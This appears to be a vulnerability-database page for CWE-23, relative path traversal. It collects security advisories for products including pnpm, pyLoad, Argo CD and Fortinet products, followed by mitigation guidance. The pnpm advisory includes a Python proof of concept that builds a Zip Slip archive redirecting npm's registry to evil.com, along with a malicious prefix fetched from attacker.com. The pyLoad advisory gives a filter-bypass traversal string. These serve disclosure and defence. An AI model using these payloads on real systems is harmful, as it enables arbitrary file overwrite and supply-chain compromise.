CWE-23
AllowedRelative Path Traversal
Abstraction: Base · Status: Draft
The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory.
778 vulnerabilities reference this CWE, most recent first.
GHSA-6HMR-48FM-WFHX
Vulnerability from github – Published: 2024-02-28 06:30 – Updated: 2024-02-28 06:30A user who is privileged already manager or admin can set their profile picture via the frontend API using a relative filepath to then user the PFP GET API to download any valid files.
The attacker would have to have been granted privileged permissions to the system before executing this attack.
{
"affected": [],
"aliases": [
"CVE-2024-0550"
],
"database_specific": {
"cwe_ids": [
"CWE-23"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-02-28T05:15:08Z",
"severity": "CRITICAL"
},
"details": "A user who is privileged already `manager` or `admin` can set their profile picture via the frontend API using a relative filepath to then user the PFP GET API to download any valid files.\n\nThe attacker would have to have been granted privileged permissions to the system before executing this attack.",
"id": "GHSA-6hmr-48fm-wfhx",
"modified": "2024-02-28T06:30:28Z",
"published": "2024-02-28T06:30:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0550"
},
{
"type": "WEB",
"url": "https://github.com/mintplex-labs/anything-llm/commit/e1dcd5ded010b03abd6aa32d1bf0668a48e38e17"
},
{
"type": "WEB",
"url": "https://huntr.com/bounties/c6afeb5e-f211-4b3d-aa4b-6bad734217a6"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-6JQW-JWF5-RP8H
Vulnerability from github – Published: 2023-09-27 20:14 – Updated: 2023-09-27 20:14Impact
In Argo CD versions prior to 2.3 (starting at least in v0.1.0, but likely in any version using Helm before 2.3), using a specifically-crafted Helm file could reference external Helm charts handled by the same repo-server to leak values, or files from the referenced Helm Chart. This was possible because Helm paths were predictable.
The vulnerability worked by adding a Helm chart that referenced Helm resources from predictable paths. Because the paths of Helm charts were predictable and available on an instance of repo-server, it was possible to reference and then render the values and resources from other existing Helm charts regardless of permissions. While generally, secrets are not stored in these files, it was nevertheless possible to reference any values from these charts.
Patches
This issue was fixed in Argo CD 2.3 and subsequent versions by randomizing Helm paths.
Workarounds
User's still using Argo CD 2.3 or below are advised to update to a supported version. If this is not possible, disabling Helm chart rendering, or using an additional repo-server for each Helm chart would prevent possible exploitation.
References
https://github.com/argoproj/argo-cd/security/advisories/GHSA-63qx-x74g-jcr7
For more information
If you have any questions or comments about this advisory: * Open an issue in example link to repo * Email us at example email address
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.8.7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd/v2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.3.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-40026"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-23"
],
"github_reviewed": true,
"github_reviewed_at": "2023-09-27T20:14:44Z",
"nvd_published_at": "2023-09-27T21:15:09Z",
"severity": "MODERATE"
},
"details": "### Impact\nIn Argo CD versions prior to 2.3 (starting at least in v0.1.0, but likely in any version using Helm before 2.3), using a specifically-crafted Helm file could reference external Helm charts handled by the same repo-server to leak values, or files from the referenced Helm Chart. This was possible because Helm paths were predictable. \n\nThe vulnerability worked by adding a Helm chart that referenced Helm resources from predictable paths. Because the paths of Helm charts were predictable and available on an instance of repo-server, it was possible to reference and then render the values and resources from other existing Helm charts regardless of permissions. While generally, secrets are not stored in these files, it was nevertheless possible to reference any values from these charts. \n\n### Patches\nThis issue was fixed in Argo CD 2.3 and subsequent versions by randomizing Helm paths.\n\n### Workarounds\nUser\u0027s still using Argo CD 2.3 or below are advised to update to a [supported version](https://argo-cd.readthedocs.io/en/stable/operator-manual/installation/#supported-versions). If this is not possible, disabling Helm chart rendering, or using an additional repo-server for each Helm chart would prevent possible exploitation. \n\n### References\nhttps://github.com/argoproj/argo-cd/security/advisories/GHSA-63qx-x74g-jcr7\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [example link to repo](http://example.com)\n* Email us at [example email address](mailto:example@example.com)\n",
"id": "GHSA-6jqw-jwf5-rp8h",
"modified": "2023-09-27T20:14:44Z",
"published": "2023-09-27T20:14:44Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-63qx-x74g-jcr7"
},
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-6jqw-jwf5-rp8h"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40026"
},
{
"type": "WEB",
"url": "https://argo-cd.readthedocs.io/en/stable/operator-manual/installation/#supported-versions"
},
{
"type": "PACKAGE",
"url": "https://github.com/argoproj/argo-cd"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Path traversal allows leaking out-of-bound Helm charts from Argo CD repo-server"
}
GHSA-6MVG-6PJ4-7Q9Q
Vulnerability from github – Published: 2026-02-11 15:30 – Updated: 2026-02-12 15:32A relative path traversal vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to read the contents of unexpected files or system data.
We have already fixed the vulnerability in the following version: Qsync Central 5.0.0.4 ( 2026/01/20 ) and later
{
"affected": [],
"aliases": [
"CVE-2025-58467"
],
"database_specific": {
"cwe_ids": [
"CWE-23"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-11T13:15:56Z",
"severity": "LOW"
},
"details": "A relative path traversal vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to read the contents of unexpected files or system data.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later",
"id": "GHSA-6mvg-6pj4-7q9q",
"modified": "2026-02-12T15:32:43Z",
"published": "2026-02-11T15:30:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58467"
},
{
"type": "WEB",
"url": "https://www.qnap.com/en/security-advisory/qsa-26-02"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-6MWP-2WPH-QMCF
Vulnerability from github – Published: 2025-08-12 21:31 – Updated: 2025-08-12 21:31A relative path traversal vulnerability [CWE-23] in FortiSOAR 7.6.0, 7.5.0 through 7.5.1, 7.4 all versions, 7.3 all versions may allow an authenticated attacker to read arbitrary files via uploading a malicious solution pack.
{
"affected": [],
"aliases": [
"CVE-2024-48892"
],
"database_specific": {
"cwe_ids": [
"CWE-23"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-08-12T19:15:27Z",
"severity": "MODERATE"
},
"details": "A relative path traversal vulnerability [CWE-23] in FortiSOAR 7.6.0, 7.5.0 through 7.5.1, 7.4 all versions, 7.3 all versions may allow an authenticated attacker to read arbitrary files via uploading a malicious solution pack.",
"id": "GHSA-6mwp-2wph-qmcf",
"modified": "2025-08-12T21:31:20Z",
"published": "2025-08-12T21:31:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-48892"
},
{
"type": "WEB",
"url": "https://fortiguard.fortinet.com/psirt/FG-IR-24-421"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-6PFH-P556-V868
Vulnerability from github – Published: 2026-01-26 21:02 – Updated: 2026-01-28 16:18Summary
A path traversal vulnerability in pnpm's binary fetcher allows malicious packages to write files outside the intended extraction directory. The vulnerability has two attack vectors: (1) Malicious ZIP entries containing ../ or absolute paths that escape the extraction root via AdmZip's extractAllTo, and (2) The BinaryResolution.prefix field is concatenated into the extraction path without validation, allowing a crafted prefix like ../../evil to redirect extracted files outside targetDir.
Details
The vulnerability exists in the binary fetching and extraction logic:
1. Unvalidated ZIP Entry Extraction (fetching/binary-fetcher/src/index.ts)
AdmZip's extractAllTo does not validate entry paths for path traversal:
const zip = new AdmZip(buffer)
const nodeDir = basename === '' ? targetDir : path.dirname(targetDir)
const extractedDir = path.join(nodeDir, basename)
zip.extractAllTo(nodeDir, true) // Entry paths not validated!
await renameOverwrite(extractedDir, targetDir)
A ZIP entry with path ../../../.npmrc will be written outside nodeDir.
2. Unvalidated Prefix in BinaryResolution (resolving/resolver-base/src/index.ts)
The basename variable comes from BinaryResolution.prefix and is used directly in path construction:
const extractedDir = path.join(nodeDir, basename)
// If basename is '../../evil', this points outside nodeDir
PoC
Attack Vector 1: ZIP Entry Path Traversal
import zipfile
import io
zip_buffer = io.BytesIO()
with zipfile.ZipFile(zip_buffer, 'w') as zf:
# Normal file
zf.writestr('node-v20.0.0-linux-x64/bin/node', b'#!/bin/sh\necho "legit node"')
# Malicious path traversal entry
zf.writestr('../../../.npmrc', b'registry=https://evil.com/\n')
with open('malicious-node.zip', 'wb') as f:
f.write(zip_buffer.getvalue())
Attack Vector 2: Prefix Traversal via malicious resolution:
{
"resolution": {
"type": "binary",
"url": "https://attacker.com/node.zip",
"prefix": "../../PWNED"
}
}
Impact
- All pnpm users who install packages with binary assets
- Users who configure custom Node.js binary locations
- CI/CD pipelines that auto-install binary dependencies
- Can overwrite config files, scripts, or other sensitive files leading to RCE
Verified on pnpm main @ commit 5a0ed1d45.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "pnpm"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "10.28.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-23888"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-23",
"CWE-426"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-26T21:02:49Z",
"nvd_published_at": "2026-01-26T22:15:56Z",
"severity": "MODERATE"
},
"details": "### Summary\n\nA path traversal vulnerability in pnpm\u0027s binary fetcher allows malicious packages to write files outside the intended extraction directory. The vulnerability has two attack vectors: (1) Malicious ZIP entries containing `../` or absolute paths that escape the extraction root via AdmZip\u0027s `extractAllTo`, and (2) The `BinaryResolution.prefix` field is concatenated into the extraction path without validation, allowing a crafted prefix like `../../evil` to redirect extracted files outside `targetDir`.\n\n### Details\n\nThe vulnerability exists in the binary fetching and extraction logic:\n\n**1. Unvalidated ZIP Entry Extraction (`fetching/binary-fetcher/src/index.ts`)**\n\nAdmZip\u0027s `extractAllTo` does not validate entry paths for path traversal:\n\n```typescript\nconst zip = new AdmZip(buffer)\nconst nodeDir = basename === \u0027\u0027 ? targetDir : path.dirname(targetDir)\nconst extractedDir = path.join(nodeDir, basename)\nzip.extractAllTo(nodeDir, true) // Entry paths not validated!\nawait renameOverwrite(extractedDir, targetDir)\n```\n\nA ZIP entry with path `../../../.npmrc` will be written outside `nodeDir`.\n\n**2. Unvalidated Prefix in BinaryResolution (`resolving/resolver-base/src/index.ts`)**\n\nThe `basename` variable comes from `BinaryResolution.prefix` and is used directly in path construction:\n\n```typescript\nconst extractedDir = path.join(nodeDir, basename)\n// If basename is \u0027../../evil\u0027, this points outside nodeDir\n```\n\n### PoC\n\n**Attack Vector 1: ZIP Entry Path Traversal**\n\n```python\nimport zipfile\nimport io\n\nzip_buffer = io.BytesIO()\nwith zipfile.ZipFile(zip_buffer, \u0027w\u0027) as zf:\n # Normal file\n zf.writestr(\u0027node-v20.0.0-linux-x64/bin/node\u0027, b\u0027#!/bin/sh\\necho \"legit node\"\u0027)\n # Malicious path traversal entry\n zf.writestr(\u0027../../../.npmrc\u0027, b\u0027registry=https://evil.com/\\n\u0027)\n\nwith open(\u0027malicious-node.zip\u0027, \u0027wb\u0027) as f:\n f.write(zip_buffer.getvalue())\n```\n\n**Attack Vector 2: Prefix Traversal via malicious resolution:**\n\n```json\n{\n \"resolution\": {\n \"type\": \"binary\",\n \"url\": \"https://attacker.com/node.zip\",\n \"prefix\": \"../../PWNED\"\n }\n}\n```\n\n### Impact\n\n- All pnpm users who install packages with binary assets\n- Users who configure custom Node.js binary locations\n- CI/CD pipelines that auto-install binary dependencies\n- Can overwrite config files, scripts, or other sensitive files leading to RCE\n\nVerified on pnpm main @ commit `5a0ed1d45`.",
"id": "GHSA-6pfh-p556-v868",
"modified": "2026-01-28T16:18:11Z",
"published": "2026-01-26T21:02:49Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pnpm/pnpm/security/advisories/GHSA-6pfh-p556-v868"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23888"
},
{
"type": "WEB",
"url": "https://github.com/pnpm/pnpm/commit/5c382f0ca3b7cc49963b94677426e66539dcb3f5"
},
{
"type": "PACKAGE",
"url": "https://github.com/pnpm/pnpm"
},
{
"type": "WEB",
"url": "https://github.com/pnpm/pnpm/releases/tag/v10.28.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "pnpm: Binary ZIP extraction allows arbitrary file write via path traversal (Zip Slip)"
}
GHSA-6PX9-J4QR-XFJW
Vulnerability from github – Published: 2026-03-05 00:32 – Updated: 2026-06-08 19:06The edit_package() function implements insufficient sanitization for the pack_folder parameter. The current protection relies on a single-pass string replacement of "../", which can be bypassed using crafted recursive traversal sequences.
Exploitation
An authenticated user with MODIFY permission can bypass the sanitization by submitting a payload such as:
pack_folder=..././..././..././tmp
After the single-pass replacement, this becomes:
../../../tmp
Because the traversal sequences are not properly validated, the resulting normalized path escapes the intended storage directory and writes files to /tmp or other locations.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.5.0b3.dev96"
},
"package": {
"ecosystem": "PyPI",
"name": "pyload-ng"
},
"ranges": [
{
"events": [
{
"introduced": "0.5.0b3.dev13"
},
{
"fixed": "0.5.0b3.dev97"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-29778"
],
"database_specific": {
"cwe_ids": [
"CWE-23"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-05T00:32:19Z",
"nvd_published_at": "2026-03-07T16:15:54Z",
"severity": "HIGH"
},
"details": "The edit_package() function implements insufficient sanitization for the pack_folder parameter. The current protection relies on a single-pass string replacement of \"../\", which can be bypassed using crafted recursive traversal sequences.\n\nExploitation\n\nAn authenticated user with MODIFY permission can bypass the sanitization by submitting a payload such as:\n`pack_folder=..././..././..././tmp`\n\nAfter the single-pass replacement, this becomes:\n`../../../tmp`\n\nBecause the traversal sequences are not properly validated, the resulting normalized path escapes the intended storage directory and writes files to /tmp or other locations.",
"id": "GHSA-6px9-j4qr-xfjw",
"modified": "2026-06-08T19:06:27Z",
"published": "2026-03-05T00:32:19Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pyload/pyload/security/advisories/GHSA-6px9-j4qr-xfjw"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29778"
},
{
"type": "PACKAGE",
"url": "https://github.com/pyload/pyload"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-121.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "pyLoad has an Arbitrary File Write via Path Traversal in edit_package()"
}
GHSA-6Q7W-CJQ4-J969
Vulnerability from github – Published: 2026-04-14 18:30 – Updated: 2026-04-14 18:30A relative path traversal vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.2, FortiWeb 7.6.0 through 7.6.6, FortiWeb 7.4.1 through 7.4.12, FortiWeb 7.2.7 through 7.2.12, FortiWeb 7.0.10 through 7.0.12 may allow attacker to execute unauthorized code or commands via
{
"affected": [],
"aliases": [
"CVE-2026-39814"
],
"database_specific": {
"cwe_ids": [
"CWE-23"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-04-14T16:16:45Z",
"severity": "MODERATE"
},
"details": "A relative path traversal vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.2, FortiWeb 7.6.0 through 7.6.6, FortiWeb 7.4.1 through 7.4.12, FortiWeb 7.2.7 through 7.2.12, FortiWeb 7.0.10 through 7.0.12 may allow attacker to execute unauthorized code or commands via \u003cinsert attack vector here\u003e",
"id": "GHSA-6q7w-cjq4-j969",
"modified": "2026-04-14T18:30:36Z",
"published": "2026-04-14T18:30:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39814"
},
{
"type": "WEB",
"url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-114"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-6Q9J-3828-RFXJ
Vulnerability from github – Published: 2022-05-17 04:04 – Updated: 2025-07-02 21:31Directory traversal vulnerability in the Runtime Toolkit in CODESYS Runtime System 2.3.x and 2.4.x allows remote attackers to read, overwrite, or create arbitrary files via a .. (dot dot) in a request to the TCP listener service.
{
"affected": [],
"aliases": [
"CVE-2012-6069"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-23"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2013-01-21T21:55:00Z",
"severity": "HIGH"
},
"details": "Directory traversal vulnerability in the Runtime Toolkit in CODESYS Runtime System 2.3.x and 2.4.x allows remote attackers to read, overwrite, or create arbitrary files via a .. (dot dot) in a request to the TCP listener service.",
"id": "GHSA-6q9j-3828-rfxj",
"modified": "2025-07-02T21:31:54Z",
"published": "2022-05-17T04:04:57Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2012-6069"
},
{
"type": "WEB",
"url": "https://us.codesys.com/ecosystem/security"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-13-011-01"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-14-084-01"
},
{
"type": "WEB",
"url": "http://ics-cert.us-cert.gov/advisories/ICSA-14-084-01"
},
{
"type": "WEB",
"url": "http://www.codesys.com/news-events/press-releases/detail/article/sicherheitsluecke-in-codesys-v23-laufzeitsystem.html"
},
{
"type": "WEB",
"url": "http://www.digitalbond.com/tools/basecamp/3s-codesys"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/56300"
},
{
"type": "WEB",
"url": "http://www.us-cert.gov/control_systems/pdf/ICSA-13-011-01.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-72GC-6XCF-Q52M
Vulnerability from github – Published: 2022-07-23 00:00 – Updated: 2022-07-30 00:00The affected product is vulnerable to directory traversal, which may allow an attacker to access unauthorized files and execute arbitrary code.
{
"affected": [],
"aliases": [
"CVE-2022-2139"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-23"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-07-22T15:15:00Z",
"severity": "CRITICAL"
},
"details": "The affected product is vulnerable to directory traversal, which may allow an attacker to access unauthorized files and execute arbitrary code.",
"id": "GHSA-72gc-6xcf-q52m",
"modified": "2022-07-30T00:00:43Z",
"published": "2022-07-23T00:00:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-2139"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-179-03"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-732V-X297-MCRM
Vulnerability from github – Published: 2023-05-04 00:30 – Updated: 2024-04-04 03:47A relative path traversal [CWE-23] in Fortinet FortiADC version 7.2.0 and before 7.1.1 allows a privileged attacker to delete arbitrary directories from the underlying file system via crafted CLI commands.
{
"affected": [],
"aliases": [
"CVE-2023-27993"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-23"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-05-03T22:15:18Z",
"severity": "HIGH"
},
"details": "A relative path traversal [CWE-23] in Fortinet FortiADC version 7.2.0 and before 7.1.1 allows a privileged attacker to delete arbitrary directories from the underlying file system via crafted CLI commands.",
"id": "GHSA-732v-x297-mcrm",
"modified": "2024-04-04T03:47:46Z",
"published": "2023-05-04T00:30:18Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-27993"
},
{
"type": "WEB",
"url": "https://fortiguard.com/psirt/FG-IR-23-069"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation MIT-5.1
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
- When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.
- Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string.
Mitigation MIT-20.1
Strategy: Input Validation
- Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked.
- Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links (CWE-23, CWE-59). This includes:
- realpath() in C
- getCanonicalPath() in Java
- GetFullPath() in ASP.NET
- realpath() or abs_path() in Perl
- realpath() in PHP
Mitigation MIT-29
Strategy: Firewall
Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].
CAPEC-139: Relative Path Traversal
An attacker exploits a weakness in input validation on the target by supplying a specially constructed path utilizing dot and slash characters for the purpose of obtaining access to arbitrary files or resources. An attacker modifies a known path on the target in order to reach material that is not available through intended channels. These attacks normally involve adding additional path separators (/ or \) and/or dots (.), or encodings thereof, in various combinations in order to reach parent directories or entirely separate trees of the target's directory structure.
CAPEC-76: Manipulating Web Input to File System Calls
An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.